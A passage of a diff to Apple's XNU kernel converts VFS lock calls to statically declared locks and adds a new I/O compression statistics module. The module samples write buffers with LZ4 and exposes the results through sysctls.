- */ -#if QUOTA - dqinit(); -#endif - /* * create a mount point for dead vnodes */ @@ -518,43 +410,43 @@ vfsinit(void) void vnode_list_lock(void) { - lck_spin_lock_grp(vnode_list_spin_lock, vnode_list_lck_grp); + lck_spin_lock_grp(&vnode_list_spin_lock, &vnode_list_lck_grp); } void vnode_list_unlock(void) { - lck_spin_unlock(vnode_list_spin_lock); + lck_spin_unlock(&vnode_list_spin_lock); } void mount_list_lock(void) { - lck_mtx_lock(mnt_list_mtx_lock); + lck_mtx_lock(&mnt_list_mtx_lock); } void mount_list_unlock(void) { - lck_mtx_unlock(mnt_list_mtx_lock); + lck_mtx_unlock(&mnt_list_mtx_lock); } void mount_lock_init(mount_t mp) { - lck_mtx_init(&mp->mnt_mlock, mnt_lck_grp, mnt_lck_attr); - lck_mtx_init(&mp->mnt_iter_lock, mnt_lck_grp, mnt_lck_attr); - lck_mtx_init(&mp->mnt_renamelock, mnt_lck_grp, mnt_lck_attr); - lck_rw_init(&mp->mnt_rwlock, mnt_lck_grp, mnt_lck_attr); + lck_mtx_init(&mp->mnt_mlock, &mnt_lck_grp, &mnt_lck_attr); + lck_mtx_init(&mp->mnt_iter_lock, &mnt_lck_grp, &mnt_lck_attr); + lck_mtx_init(&mp->mnt_renamelock, &mnt_lck_grp, &mnt_lck_attr); + lck_rw_init(&mp->mnt_rwlock, &mnt_lck_grp, &mnt_lck_attr); } void mount_lock_destroy(mount_t mp) { - lck_mtx_destroy(&mp->mnt_mlock, mnt_lck_grp); - lck_mtx_destroy(&mp->mnt_iter_lock, mnt_lck_grp); - lck_mtx_destroy(&mp->mnt_renamelock, mnt_lck_grp); - lck_rw_destroy(&mp->mnt_rwlock, mnt_lck_grp); + lck_mtx_destroy(&mp->mnt_mlock, &mnt_lck_grp); + lck_mtx_destroy(&mp->mnt_iter_lock, &mnt_lck_grp); + lck_mtx_destroy(&mp->mnt_renamelock, &mnt_lck_grp); + lck_rw_destroy(&mp->mnt_rwlock, &mnt_lck_grp); } @@ -676,7 +568,7 @@ vfstable_del(struct vfstable * vtbl) struct vfstable *vcdelp; #if DEBUG - lck_mtx_assert(mnt_list_mtx_lock, LCK_MTX_ASSERT_OWNED); + lck_mtx_assert(&mnt_list_mtx_lock, LCK_MTX_ASSERT_OWNED); #endif /* DEBUG */ /* @@ -727,7 +619,7 @@ vfstable_del(struct vfstable * vtbl) } #if DEBUG - lck_mtx_assert(mnt_list_mtx_lock, LCK_MTX_ASSERT_OWNED); + lck_mtx_assert(&mnt_list_mtx_lock, 
LCK_MTX_ASSERT_OWNED); #endif /* DEBUG */ return 0; @@ -736,11 +628,11 @@ vfstable_del(struct vfstable * vtbl) void SPECHASH_LOCK(void) { - lck_mtx_lock(spechash_mtx_lock); + lck_mtx_lock(&spechash_mtx_lock); } void SPECHASH_UNLOCK(void) { - lck_mtx_unlock(spechash_mtx_lock); + lck_mtx_unlock(&spechash_mtx_lock); } diff --git a/bsd/vfs/vfs_io_compression_stats.c b/bsd/vfs/vfs_io_compression_stats.c new file mode 100644 index 000000000..d2fee5f2c --- /dev/null +++ b/bsd/vfs/vfs_io_compression_stats.c @@ -0,0 +1,738 @@ +/* + * Copyright (c) 2020 Apple Inc. All rights reserved. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ + * + * This file contains Original Code and/or Modifications of Original Code + * as defined in and that are subject to the Apple Public Source License + * Version 2.0 (the 'License'). You may not use this file except in + * compliance with the License. The rights granted to you under the License + * may not be used to create, or enable the creation or redistribution of, + * unlawful or unlicensed copies of an Apple operating system, or to + * circumvent, violate, or enable the circumvention or violation of, any + * terms of an Apple operating system software license agreement. + * + * Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this file. + * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. + * Please see the License for the specific language governing rights and + * limitations under the License. 
+ * + * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ + */ + +#include +#include +#include + +#include +#include +#include +#include +#include + +#include +#include +#include +#include +#include + +#include + +#include +#include +#include + + +int io_compression_stats_enable = 0; +int io_compression_stats_block_size = IO_COMPRESSION_STATS_DEFAULT_BLOCK_SIZE; + +#define LZ4_SCRATCH_ALIGN (64) +typedef struct { + uint8_t lz4state[lz4_encode_scratch_size]__attribute((aligned(LZ4_SCRATCH_ALIGN))); +} lz4_encode_scratch_t; + +lz4_encode_scratch_t **per_cpu_scratch_buf; +uint8_t **per_cpu_compression_buf; +uint32_t io_compression_stats_cpu_count; +char *vnpath_scratch_buf; + +LCK_GRP_DECLARE(io_compression_stats_lckgrp, "io_compression_stats"); +LCK_RW_DECLARE(io_compression_stats_lock, &io_compression_stats_lckgrp); +LCK_MTX_DECLARE(iocs_store_buffer_lock, &io_compression_stats_lckgrp); + +typedef enum io_compression_stats_allocate_type { + IO_COMPRESSION_STATS_NEW_ALLOC = 0, + IO_COMPRESSION_STATS_RESIZE = 1 +} io_compression_stats_alloc_type_t; + +static void io_compression_stats_deallocate_compression_buffers(void); + +struct iocs_store_buffer iocs_store_buffer = { + .buffer = 0, + .current_position = 0, + .marked_point = 0 +}; + +int iocs_sb_bytes_since_last_mark = 0; +int iocs_sb_bytes_since_last_notification = 0; + +ZONE_DECLARE(io_compression_stats_zone, "io_compression_stats", + sizeof(struct io_compression_stats), ZC_NOENCRYPT | ZC_NOGC | ZC_ZFREE_CLEARMEM); + +static int +io_compression_stats_allocate_compression_buffers(io_compression_stats_alloc_type_t alloc_type, uint32_t block_size) +{ + int err = 0; + host_basic_info_data_t hinfo; + mach_msg_type_number_t count = HOST_BASIC_INFO_COUNT; +#define BSD_HOST 1 + host_info((host_t)BSD_HOST, HOST_BASIC_INFO, (host_info_t)&hinfo, &count); + + io_compression_stats_cpu_count = hinfo.max_cpus; + if (alloc_type == IO_COMPRESSION_STATS_NEW_ALLOC) { + assert(per_cpu_scratch_buf == NULL); + per_cpu_scratch_buf = 
kheap_alloc(KHEAP_DEFAULT, sizeof(lz4_encode_scratch_t *) * io_compression_stats_cpu_count, Z_ZERO); + if (per_cpu_scratch_buf == NULL) { + err = ENOMEM; + goto out; + } + assert(per_cpu_compression_buf == NULL); + per_cpu_compression_buf = kheap_alloc(KHEAP_DEFAULT, sizeof(uint8_t *) * io_compression_stats_cpu_count, Z_ZERO); + if (per_cpu_compression_buf == NULL) { + err = ENOMEM; + goto out; + } + } + for (uint32_t cpu = 0; cpu < io_compression_stats_cpu_count; cpu++) { + if (alloc_type == IO_COMPRESSION_STATS_NEW_ALLOC) { + per_cpu_scratch_buf[cpu] = kheap_alloc(KHEAP_DEFAULT, sizeof(lz4_encode_scratch_t), Z_ZERO); + if (per_cpu_scratch_buf[cpu] == NULL) { + err = ENOMEM; + goto out; + } + } else { + kheap_free_addr(KHEAP_DEFAULT, per_cpu_compression_buf[cpu]); + } + per_cpu_compression_buf[cpu] = kheap_alloc(KHEAP_DEFAULT, block_size, Z_ZERO); + if (per_cpu_compression_buf[cpu] == NULL) { + err = ENOMEM; + goto out; + } + } + bzero(&iocs_store_buffer, sizeof(struct iocs_store_buffer)); + iocs_store_buffer.buffer = kheap_alloc(KHEAP_DEFAULT, IOCS_STORE_BUFFER_SIZE, Z_ZERO); + if (iocs_store_buffer.buffer == NULL) { + err = ENOMEM; + goto out; + } + iocs_store_buffer.current_position = 0; + iocs_store_buffer.marked_point = 0; + + assert(vnpath_scratch_buf == NULL); + vnpath_scratch_buf = kheap_alloc(KHEAP_DEFAULT, MAXPATHLEN, Z_ZERO); + if (vnpath_scratch_buf == NULL) { + err = ENOMEM; + goto out; + } + +out: + if (err) { + /* In case of any error, irrespective of whether it is new alloc or resize, + * dellocate all buffers and fail */ + io_compression_stats_deallocate_compression_buffers(); + } + return err; +} + +static void +io_compression_stats_deallocate_compression_buffers() +{ + uint32_t cpu; + if (per_cpu_compression_buf != NULL) { + for (cpu = 0; cpu < io_compression_stats_cpu_count; cpu++) { + if (per_cpu_compression_buf[cpu] != NULL) { + kheap_free_addr(KHEAP_DEFAULT, per_cpu_compression_buf[cpu]); + per_cpu_compression_buf[cpu] = NULL; + } + } + 
kheap_free_addr(KHEAP_DEFAULT, per_cpu_compression_buf); + per_cpu_compression_buf = NULL; + } + + if (per_cpu_scratch_buf != NULL) { + for (cpu = 0; cpu < io_compression_stats_cpu_count; cpu++) { + if (per_cpu_scratch_buf[cpu] != NULL) { + kheap_free_addr(KHEAP_DEFAULT, per_cpu_scratch_buf[cpu]); + per_cpu_scratch_buf[cpu] = NULL; + } + } + kheap_free_addr(KHEAP_DEFAULT, per_cpu_scratch_buf); + per_cpu_scratch_buf = NULL; + } + + if (iocs_store_buffer.buffer != NULL) { + kheap_free_addr(KHEAP_DEFAULT, iocs_store_buffer.buffer); + bzero(&iocs_store_buffer, sizeof(struct iocs_store_buffer)); + } + + iocs_sb_bytes_since_last_mark = 0; + iocs_sb_bytes_since_last_notification = 0; + + if (vnpath_scratch_buf != NULL) { + kheap_free_addr(KHEAP_DEFAULT, vnpath_scratch_buf); + vnpath_scratch_buf = NULL; + } +} + + +static int +sysctl_io_compression_stats_enable SYSCTL_HANDLER_ARGS +{ +#pragma unused (arg1, arg2, oidp) + + int error = 0; + int enable = 0; + + error = SYSCTL_OUT(req, &io_compression_stats_enable, sizeof(int)); + + if (error || !req->newptr) { + return error; + } + + error = SYSCTL_IN(req, &enable, sizeof(int)); + if (error) { + return error; + } + + if (!((enable == 1) || (enable == 0))) { + return EINVAL; + } + + lck_rw_lock_exclusive(&io_compression_stats_lock); + lck_mtx_lock(&iocs_store_buffer_lock); + if ((io_compression_stats_enable == 0) && (enable == 1)) { + /* Enabling collection of stats. 
Allocate appropriate buffers */ + error = io_compression_stats_allocate_compression_buffers(IO_COMPRESSION_STATS_NEW_ALLOC, io_compression_stats_block_size); + if (error == 0) { + io_compression_stats_enable = enable; + io_compression_stats_dbg("SUCCESS: setting io_compression_stats_enable to %d", io_compression_stats_enable); + } else { + io_compression_stats_dbg("FAILED: setting io_compression_stats_enable to %d", io_compression_stats_enable); + } + } else if ((io_compression_stats_enable == 1) && (enable == 0)) { + io_compression_stats_deallocate_compression_buffers(); + io_compression_stats_enable = 0; + io_compression_stats_dbg("SUCCESS: setting io_compression_stats_enable to %d", io_compression_stats_enable); + } + lck_mtx_unlock(&iocs_store_buffer_lock); + lck_rw_unlock_exclusive(&io_compression_stats_lock); + + return error; +} +SYSCTL_PROC(_vfs, OID_AUTO, io_compression_stats_enable, CTLTYPE_INT | CTLFLAG_RW, 0, 0, &sysctl_io_compression_stats_enable, "I", ""); + +static int +sysctl_io_compression_block_size SYSCTL_HANDLER_ARGS +{ +#pragma unused (arg1, arg2, oidp) + + int error = 0; + int block_size = io_compression_stats_block_size; + + error = SYSCTL_OUT(req, &block_size, sizeof(int)); + + if (error || !req->newptr) { + return error; + } + + error = SYSCTL_IN(req, &block_size, sizeof(int)); + if (error) { + return error; + } + + if (block_size < IO_COMPRESSION_STATS_MIN_BLOCK_SIZE || block_size > IO_COMPRESSION_STATS_MAX_BLOCK_SIZE) { + return EINVAL; + } + + lck_rw_lock_exclusive(&io_compression_stats_lock); + + if (io_compression_stats_block_size != block_size) { + if (io_compression_stats_enable == 1) { + /* IO compression stats is enabled, rellocate buffers. 
*/ + error = io_compression_stats_allocate_compression_buffers(IO_COMPRESSION_STATS_RESIZE, block_size); + if (error == 0) { + io_compression_stats_block_size = block_size; + io_compression_stats_dbg("SUCCESS: setting io_compression_stats_block_size to %d", io_compression_stats_block_size); + } else { + /* Failed to allocate buffers, disable IO compression stats */ + io_compression_stats_enable = 0; + io_compression_stats_dbg("Failed: setting io_compression_stats_block_size to %d", io_compression_stats_block_size); + } + } else { + /* IO compression stats is disabled, only set the io_compression_stats_block_size */ + io_compression_stats_block_size = block_size; + io_compression_stats_dbg("SUCCESS: setting io_compression_stats_block_size to %d", io_compression_stats_block_size); + } + } + lck_rw_unlock_exclusive(&io_compression_stats_lock); + + + return error; +} +SYSCTL_PROC(_vfs, OID_AUTO, io_compression_stats_block_size, CTLTYPE_INT | CTLFLAG_RW, 0, 0, &sysctl_io_compression_block_size, "I", ""); + + +static int32_t +iocs_compress_block(uint8_t *block_ptr, uint32_t block_size) +{ + disable_preemption(); + + uint32_t current_cpu = cpu_number(); + if (!(current_cpu < io_compression_stats_cpu_count)) { + enable_preemption(); + return -1; + } + + lz4_encode_scratch_t *scratch_buf = per_cpu_scratch_buf[current_cpu]; + uint8_t *dest_buf = per_cpu_compression_buf[current_cpu]; + + int compressed_block_size = (int) lz4raw_encode_buffer(dest_buf, block_size, + block_ptr, block_size, (lz4_hash_entry_t *) scratch_buf); + + enable_preemption(); + + return compressed_block_size; +} +/* + * Compress buf in chunks of io_compression_stats_block_size + */ +static uint32_t +iocs_compress_buffer(vnode_t vn, uint8_t *buf_ptr, uint32_t buf_size) +{ + uint32_t offset; + uint32_t compressed_size = 0; + int block_size = io_compression_stats_block_size; + int block_stats_scaling_factor = block_size / IOCS_BLOCK_NUM_SIZE_BUCKETS; + + for (offset = 0; offset < buf_size; offset += 
block_size) { + int current_block_size = min(block_size, buf_size - offset); + int current_compressed_block_size = iocs_compress_block(buf_ptr + offset, current_block_size); + + if (current_compressed_block_size == 0) { + compressed_size += current_block_size; + vnode_updateiocompressionblockstats(vn, current_block_size / block_stats_scaling_factor); + } else if (current_compressed_block_size != -1) { + compressed_size += current_compressed_block_size; + vnode_updateiocompressionblockstats(vn, current_compressed_block_size / block_stats_scaling_factor); + } + } + + return compressed_size; +} + +static uint32_t +log2down(uint32_t x) +{ + return 31 - __builtin_clz(x); +} + +/* + * Once we get the IO compression stats for the entire buffer, we update buffer_size_compressibility_dist, + * which helps us observe distribution across various io sizes and compression factors. + * The goal of next two functions is to get the index in this buffer_size_compressibility_dist table. + */ + +/* + * Maps IO size to a bucket between 0 - IO_COMPRESSION_STATS_MAX_SIZE_BUCKET + * for size < 4096 returns 0 and size > 1MB returns IO_COMPRESSION_STATS_MAX_SIZE_BUCKET (9). + * For IO sizes in-between we arrive at the index based on log2 function. 
+ * sizes 4097 - 8192 => index = 1, + * sizes 8193 - 16384 => index = 2, and so on + */ +#define SIZE_COMPRESSION_DIST_SIZE_BUCKET_MIN 4096 +#define SIZE_COMPRESSION_DIST_SIZE_BUCKET_MAX (1024 * 1024) +static uint32_t +get_buffer_size_bucket(uint32_t size) +{ + if (size <= SIZE_COMPRESSION_DIST_SIZE_BUCKET_MIN) { + return 0; + } + if (size > SIZE_COMPRESSION_DIST_SIZE_BUCKET_MAX) { + return IOCS_BUFFER_MAX_BUCKET; + } +#define IOCS_INDEX_MAP_OFFSET 11 + return log2down(size - 1) - IOCS_INDEX_MAP_OFFSET; +} + +/* + * Maps compression factor to a bucket between 0 - IO_COMPRESSION_STATS_MAX_COMPRESSION_BUCKET + */ +static uint32_t +get_buffer_compressibility_bucket(uint32_t uncompressed_size, uint32_t compressed_size) +{ + int saved_space_pc = (uncompressed_size - compressed_size) * 100 / uncompressed_size; + + if (saved_space_pc < 0) { + saved_space_pc = 0; + } + + /* saved_space_pc lies bw 0 - 100. log2(saved_space_pc) lies bw 0 - 6 */ + return log2down(saved_space_pc); +} + +void +io_compression_stats(buf_t bp) +{ + uint8_t *buf_ptr = NULL; + int bflags = bp->b_flags; + uint32_t compressed_size = 0; + uint32_t buf_cnt = buf_count(bp); + uint64_t duration = 0; + caddr_t vaddr = NULL; + vnode_t vn = buf_vnode(bp); + int err = 0; + + if ((io_compression_stats_enable != 1) || (bflags & B_READ) || (buf_cnt <= 0)) { + return; + } + + if (!lck_rw_try_lock_shared(&io_compression_stats_lock)) { + /* sysctl modifying IO compression stats parameters is in progress. + * Don't block, since malloc might be in progress. 
*/ + return; + } + /* re-check io_compression_stats_enable with lock */ + if (io_compression_stats_enable != 1) { + goto out; + } + + err = buf_map(bp, &vaddr); + if (!err) { + buf_ptr = (uint8_t *) vaddr; + } + + if (buf_ptr != NULL) { + int64_t start = mach_absolute_time(); + compressed_size = iocs_compress_buffer(vn, buf_ptr, buf_cnt); + absolutetime_to_nanoseconds(mach_absolute_time() - start, &duration); + + if (compressed_size != 0) { + vnode_updateiocompressionbufferstats(vn, buf_cnt, compressed_size, + get_buffer_size_bucket(buf_cnt), + get_buffer_compressibility_bucket(buf_cnt, compressed_size)); + } + } + + KDBG_RELEASE(FSDBG_CODE(DBG_VFS, DBG_VFS_IO_COMPRESSION_STATS) | DBG_FUNC_NONE, + duration, io_compression_stats_block_size, compressed_size, buf_cnt, 0); + +out: + lck_rw_unlock_shared(&io_compression_stats_lock); + if (buf_ptr != NULL) { + buf_unmap(bp); + } +} + +static void +iocs_notify_user(void) +{ + mach_port_t user_port = MACH_PORT_NULL; + kern_return_t kr = host_get_iocompressionstats_port(host_priv_self(), &user_port); + if ((kr != KERN_SUCCESS) || !IPC_PORT_VALID(user_port)) { + return; + } + iocompressionstats_notification(user_port, 0); + ipc_port_release_send(user_port); +} +static void +construct_iocs_sbe_from_vnode(struct vnode *vp, struct iocs_store_buffer_entry *iocs_sbe) +{ + int path_len = MAXPATHLEN; + + vn_getpath(vp, vnpath_scratch_buf, &path_len); + /* + * Total path length is path_len, we can copy out IOCS_SBE_PATH_LEN bytes. We are interested + * in first segment of the path to try and figure out the process writing to the file, and we are + * interested in the last segment to figure out extention. So, in cases where + * IOCS_SBE_PATH_LEN < path_len, lets copy out first IOCS_PATH_START_BYTES_TO_COPY bytes and + * last IOCS_PATH_END_BYTES_TO_COPY (last segment includes the null character). 
+ */ + if (path_len > IOCS_SBE_PATH_LEN) { + strncpy(iocs_sbe->path_name, vnpath_scratch_buf, IOCS_PATH_START_BYTES_TO_COPY); + strncpy(iocs_sbe->path_name + IOCS_PATH_START_BYTES_TO_COPY, + vnpath_scratch_buf + path_len - IOCS_PATH_END_BYTES_TO_COPY, + IOCS_PATH_END_BYTES_TO_COPY); + } else { + strncpy(iocs_sbe->path_name, vnpath_scratch_buf, IOCS_SBE_PATH_LEN); + } + memcpy(&iocs_sbe->iocs, vp->io_compression_stats, sizeof(struct io_compression_stats)); +} +void +vnode_iocs_record_and_free(struct vnode *vp) +{ + int notify = 0; + struct iocs_store_buffer_entry *iocs_sbe = NULL; + + if (!lck_mtx_try_lock(&iocs_store_buffer_lock)) { + goto out; + } + + if (iocs_store_buffer.buffer == NULL) { + goto release; + } + + assert(iocs_store_buffer.current_position + sizeof(struct iocs_store_buffer_entry) <= IOCS_STORE_BUFFER_SIZE); + + iocs_sbe = (struct iocs_store_buffer_entry *)(iocs_store_buffer.buffer + iocs_store_buffer.current_position); + + construct_iocs_sbe_from_vnode(vp, iocs_sbe); + + iocs_store_buffer.current_position += sizeof(struct iocs_store_buffer_entry); + + if (iocs_store_buffer.current_position + sizeof(struct iocs_store_buffer_entry) > IOCS_STORE_BUFFER_SIZE) { + /* We've reached end of the buffer, move back to the top */ + iocs_store_buffer.current_position = 0; + } + + iocs_sb_bytes_since_last_mark += sizeof(struct iocs_store_buffer_entry); + iocs_sb_bytes_since_last_notification += sizeof(struct iocs_store_buffer_entry); + + if ((iocs_sb_bytes_since_last_mark > IOCS_STORE_BUFFER_NOTIFY_AT) && + (iocs_sb_bytes_since_last_notification > IOCS_STORE_BUFFER_NOTIFICATION_INTERVAL)) { + notify = 1; + iocs_sb_bytes_since_last_notification = 0; + } + +release: + lck_mtx_unlock(&iocs_store_buffer_lock); +out: + /* We need to free io_compression_stats whether or not we were able to record it */ + bzero(vp->io_compression_stats, sizeof(struct io_compression_stats)); + zfree(io_compression_stats_zone, vp->io_compression_stats); + vp->io_compression_stats = NULL; 
+ if (notify) { + iocs_notify_user(); + } +} + +struct vnode_iocs_context { + struct sysctl_req *addr; + int current_ptr; +}; + +static int +vnode_iocs_callback(struct vnode *vp, void *vctx) +{ + struct vnode_iocs_context *ctx = vctx; + struct sysctl_req *req = ctx->addr; + int current_ptr = ctx->current_ptr; + + if (current_ptr + sizeof(struct iocs_store_buffer_entry) < req->oldlen) { + if (vp->io_compression_stats != NULL) { + construct_iocs_sbe_from_vnode(vp, (struct iocs_store_buffer_entry *) (req->oldptr + current_ptr)); + current_ptr += sizeof(struct iocs_store_buffer_entry); + } + } else { + return VNODE_RETURNED_DONE; + } + ctx->current_ptr = current_ptr; + + return VNODE_RETURNED; +} + +static int +vfs_iocs_callback(mount_t mp, void *arg) +{ + if (mp->mnt_flag & MNT_LOCAL) { + vnode_iterate(mp, VNODE_ITERATE_ALL, vnode_iocs_callback, arg); + } + + return VFS_RETURNED; +} + +extern long numvnodes; + +static int +sysctl_io_compression_dump_stats SYSCTL_HANDLER_ARGS +{ +#pragma unused (arg1, arg2, oidp) + + int32_t error = 0; + uint32_t inp_flag = 0; + uint32_t ret_len; + + if (io_compression_stats_enable == 0) { + error = EINVAL; + goto out; + } + + if ((req->newptr != USER_ADDR_NULL) && (req->newlen == sizeof(uint32_t))) { + error = SYSCTL_IN(req, &inp_flag, sizeof(uint32_t)); + if (error) { + goto out; + } + switch (inp_flag) { + case IOCS_SYSCTL_LIVE: + case IOCS_SYSCTL_STORE_BUFFER_RD_ONLY: + case IOCS_SYSCTL_STORE_BUFFER_MARK: + break; + default: + error = EINVAL; + goto out; + } + } else { + error = EINVAL; + goto out; + } + + if (req->oldptr == USER_ADDR_NULL) { + /* Query to figure out size of the buffer */ + if (inp_flag & IOCS_SYSCTL_LIVE) { + req->oldidx = numvnodes * sizeof(struct iocs_store_buffer_entry); + } else { + /* Buffer size for archived case, let's keep it + * simple and return IOCS store buffer size */ + req->oldidx = IOCS_STORE_BUFFER_SIZE; + } + goto out; + } + + if (inp_flag & IOCS_SYSCTL_LIVE) { + struct vnode_iocs_context ctx; + + 
bzero(&ctx, sizeof(struct vnode_iocs_context)); + ctx.addr = req; + vfs_iterate(0, vfs_iocs_callback, &ctx); + req->oldidx = ctx.current_ptr; + goto out; + } + + /* reading from store buffer */ + lck_mtx_lock(&iocs_store_buffer_lock); + + if (iocs_store_buffer.buffer == NULL) { + error = EINVAL; + goto release; + } + if (iocs_sb_bytes_since_last_mark == 0) { + req->oldidx = 0; + goto release; + } + + int expected_size = 0; + /* Dry run to figure out amount of space required to copy out the + * iocs_store_buffer.buffer */ + if (iocs_store_buffer.marked_point < iocs_store_buffer.current_position) { + expected_size = iocs_store_buffer.current_position - iocs_store_buffer.marked_point; + } else { + expected_size = IOCS_STORE_BUFFER_SIZE - iocs_store_buffer.marked_point; + expected_size += iocs_store_buffer.current_position; + } + + if (req->oldlen < expected_size) { + error = ENOMEM; + req->oldidx = 0; + goto release; + } + + if (iocs_store_buffer.marked_point < iocs_store_buffer.current_position) { + error = copyout(iocs_store_buffer.buffer + iocs_store_buffer.marked_point, + req->oldptr, + iocs_store_buffer.current_position - iocs_store_buffer.marked_point); + if (error) { + req->oldidx = 0; + goto release; + } + ret_len = iocs_store_buffer.current_position - iocs_store_buffer.marked_point; + } else { + error = copyout(iocs_store_buffer.buffer + iocs_store_buffer.marked_point, + req->oldptr, + IOCS_STORE_BUFFER_SIZE - iocs_store_buffer.marked_point); + if (error) { + req->oldidx = 0; + goto release; + } + ret_len = IOCS_STORE_BUFFER_SIZE - iocs_store_buffer.marked_point; + + error = copyout(iocs_store_buffer.buffer, + req->oldptr + ret_len, + iocs_store_buffer.current_position); + if (error) { + req->oldidx = 0; + goto release; + } + ret_len += iocs_store_buffer.current_position; + } + + req->oldidx = ret_len; + if ((ret_len != 0) && (inp_flag & IOCS_SYSCTL_STORE_BUFFER_MARK)) { + iocs_sb_bytes_since_last_mark = 0; + iocs_store_buffer.marked_point = 
iocs_store_buffer.current_position; + } +release: + lck_mtx_unlock(&iocs_store_buffer_lock); + +out: + return error; +} +SYSCTL_PROC(_vfs, OID_AUTO, io_compression_dump_stats, CTLFLAG_WR | CTLTYPE_NODE, 0, 0, sysctl_io_compression_dump_stats, "-", ""); + +errno_t +vnode_updateiocompressionblockstats(vnode_t vp, uint32_t size_bucket) +{ + if (vp == NULL) { + return EINVAL; + } + + if (size_bucket >= IOCS_BLOCK_NUM_SIZE_BUCKETS) { + return EINVAL; + } + + if (vp->io_compression_stats == NULL) { + io_compression_stats_t iocs = (io_compression_stats_t)zalloc_flags(io_compression_stats_zone, Z_ZERO); + if (iocs == NULL) { + return ENOMEM; + } + vnode_lock_spin(vp); + /* Re-check with lock */ + if (vp->io_compression_stats == NULL) { + vp->io_compression_stats = iocs; + } else { + zfree(io_compression_stats_zone, iocs); + } + vnode_unlock(vp); + } + OSIncrementAtomic((SInt32 *)&vp->io_compression_stats->block_compressed_size_dist[size_bucket]); + + return 0; +} +errno_t +vnode_updateiocompressionbufferstats(__unused vnode_t vp, __unused uint64_t uncompressed_size, __unused uint64_t compressed_size, __unused uint32_t size_bucket, __unused uint32_t compression_bucket) +{ + if (vp == NULL) { + return EINVAL; + } + + /* vnode_updateiocompressionblockstats will always be called before vnode_updateiocompressionbufferstats. 
+ * Hence vp->io_compression_stats should already be allocated */ + if (vp->io_compression_stats == NULL) { + return EINVAL; + } + + if ((size_bucket >= IOCS_BUFFER_NUM_SIZE_BUCKETS) || (compression_bucket >= IOCS_BUFFER_NUM_COMPRESSION_BUCKETS)) { + return EINVAL; + } + + OSAddAtomic64(uncompressed_size, &vp->io_compression_stats->uncompressed_size); + OSAddAtomic64(compressed_size, &vp->io_compression_stats->compressed_size); + + OSIncrementAtomic((SInt32 *)&vp->io_compression_stats->buffer_size_compression_dist[size_bucket][compression_bucket]); + + return 0; +} diff --git a/bsd/vfs/vfs_io_compression_stats.h b/bsd/vfs/vfs_io_compression_stats.h new file mode 100644 index 000000000..decec8df7 --- /dev/null +++ b/bsd/vfs/vfs_io_compression_stats.h @@ -0,0 +1,65 @@ +/* + * Copyright (c) 2020 Apple Inc. All rights reserved. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ + * + * This file contains Original Code and/or Modifications of Original Code + * as defined in and that are subject to the Apple Public Source License + * Version 2.0 (the 'License'). You may not use this file except in + * compliance with the License. The rights granted to you under the License + * may not be used to create, or enable the creation or redistribution of, + * unlawful or unlicensed copies of an Apple operating system, or to + * circumvent, violate, or enable the circumvention or violation of, any + * terms of an Apple operating system software license agreement. + * + * Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this file. + * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 
+ * Please see the License for the specific language governing rights and + * limitations under the License. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ + */ + +#ifndef _MISCFS_SPECFS_IO_COMPRESSION_STATS_H_ +#define _MISCFS_SPECFS_IO_COMPRESSION_STATS_H_ + +#include +#include + +void io_compression_stats_init(void); +void io_compression_stats(buf_t bp); + +#define IO_COMPRESSION_STATS_DEFAULT_BLOCK_SIZE (4 * 1024) +#define IO_COMPRESSION_STATS_MIN_BLOCK_SIZE (4 * 1024) +#define IO_COMPRESSION_STATS_MAX_BLOCK_SIZE (1024 * 1024 * 1024) + +#if IO_COMPRESSION_STATS_DEBUG +#define io_compression_stats_dbg(fmt, ...) \ + printf("%s: " fmt "\n", __func__, ## __VA_ARGS__) +#else +#define io_compression_stats_dbg(fmt, ...) +#endif + +/* iocs_store_buffer: Buffer that captures the stats of vnode being reclaimed */ +struct iocs_store_buffer { + void* buffer; + uint32_t current_position; + uint32_t marked_point; +}; + +#define IOCS_STORE_BUFFER_NUM_SLOTS 10000 +#define IOCS_STORE_BUFFER_SIZE (IOCS_STORE_BUFFER_NUM_SLOTS * (sizeof(struct iocs_store_buffer_entry))) + +/* Notify user when the buffer is 80% full */ +#define IOCS_STORE_BUFFER_NOTIFY_AT ((IOCS_STORE_BUFFER_SIZE * 8) / 10) + +/* Wait for the buffer to be 10% more full before notifying again */ +#define IOCS_STORE_BUFFER_NOTIFICATION_INTERVAL (IOCS_STORE_BUFFER_SIZE / 10) + +#endif diff --git a/bsd/vfs/vfs_lookup.c b/bsd/vfs/vfs_lookup.c index 6a1700105..efe27e3e0 100644 --- a/bsd/vfs/vfs_lookup.c +++ b/bsd/vfs/vfs_lookup.c @@ -125,7 +125,7 @@ static int lookup_handle_emptyname(struct nameidata *ndp, struct co static int lookup_handle_rsrc_fork(vnode_t dp, struct nameidata *ndp, struct componentname *cnp, int wantparent, vfs_context_t ctx); #endif -extern lck_rw_t * rootvnode_rw_lock; +extern lck_rw_t rootvnode_rw_lock; /* * Convert a pathname into a pointer to a locked inode. @@ -356,7 +356,7 @@ retry_copy: * determine the starting point for the translation. 
